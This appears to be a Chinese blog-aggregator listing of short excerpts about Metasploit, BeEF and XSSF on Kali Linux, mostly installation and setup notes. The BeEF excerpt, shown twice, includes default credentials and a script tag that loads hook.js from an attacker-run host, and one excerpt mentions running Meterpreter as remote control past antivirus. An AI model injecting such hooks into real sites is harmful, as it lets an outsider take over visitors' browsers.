kali 网络服务策略使得其没有自动启动的网络服务,包括数据库服务,而metasploit需要数据库服务的支持,所以开启数据库服务的自动启动msf > db_status[*] postgresql selected, no connection简单开启服务:service postgresql s...
分类:
数据库 时间:
2015-03-28 20:17:49
阅读次数:
289
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:43:32
阅读次数:
692
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:42:11
阅读次数:
187
用过metasploit的人应该对meterpreter不陌生,它具有强大的功能,特别是其socks代理,简直就是内网渗透测试神器。由于meterpreter功能强大,萌生了想要把msf做远控的念头。另外,围绕meterpreter一个重要的问题,就是如何绕过杀软。这促使我决定一窥meterpret...
分类:
其他好文 时间:
2015-03-12 18:52:43
阅读次数:
380
折腾几天,总算是在虚拟机中安装好了4.2版本的metasploit,能够成功打开console,这里将metasploit console的指令用中文翻一下:原文及翻译: back Move back from the current context 返回 ...
分类:
Web程序 时间:
2015-03-11 14:36:43
阅读次数:
125
Title:New ipad install Metasploit(New ipad 安装Metasploit) --2012-09-19 11:35越狱以后,Ssh或者终端Ipad,把屏幕锁定最好暂时设置成永久,我的ipad有时候网络会断掉,熄灭以后。。更新源,更新软件,安装wgetsubvers...
分类:
Web程序 时间:
2015-03-07 14:07:46
阅读次数:
155
很多使用kali和bt的朋友在更新metasploit后出现了无法连接postgresql的问题,国内相关的资料也不是很多。metasploit中连接数据库可以大大提高我们的使用效率,比如searchms,在默认的慢速查找下比连接db后慢了很多。今天就详细说一下如何解决,提供2种方法。首先,启动运行msfc..
分类:
数据库 时间:
2015-03-06 06:27:14
阅读次数:
350
(linux全适用)
买了一块cubieboard4
性能挺好,想在上面安装metasploit,不过源上面没有,决定手工安装metasploit是用ruby写的(慢是有原因的,不过话说回来,即使是慢,也是大名鼎鼎的,hack界也没有听说过什么有名气的静态语言项目,所以说,不管效率如何,开发出来了就是牛B)安装依赖,这里以debian为例sudo apt-get install build-es...
分类:
Web程序 时间:
2015-03-02 22:35:10
阅读次数:
673
跨站脚本攻击框架(XSSF)使利用跨站脚本漏洞进行渗透攻击变得异常方便和快捷。该框架配合Metasploit的攻击模块真实地反映了跨站脚本漏洞的危害。XSSF不仅具有辅助的攻击功能,而且还提供与目标主机浏览器的通信信息功能,这样便于攻击者进一步对内网进行渗透。 XSSF目前的最新版本为3.0版本,该...
分类:
其他好文 时间:
2015-02-25 11:28:30
阅读次数:
276
还没开始系统性的学习Ruby,最近在看metasploit框架的exploit会涉及到Ruby脚本,也就硬着头皮一遍查阅资料一遍做些笔记吧。 Ruby字符串中存在chop和chomp的内置函数。我在http://www.w3cschool.cc/ruby/ruby-string.html中得到的关于...
分类:
其他好文 时间:
2015-02-23 11:57:50
阅读次数:
175
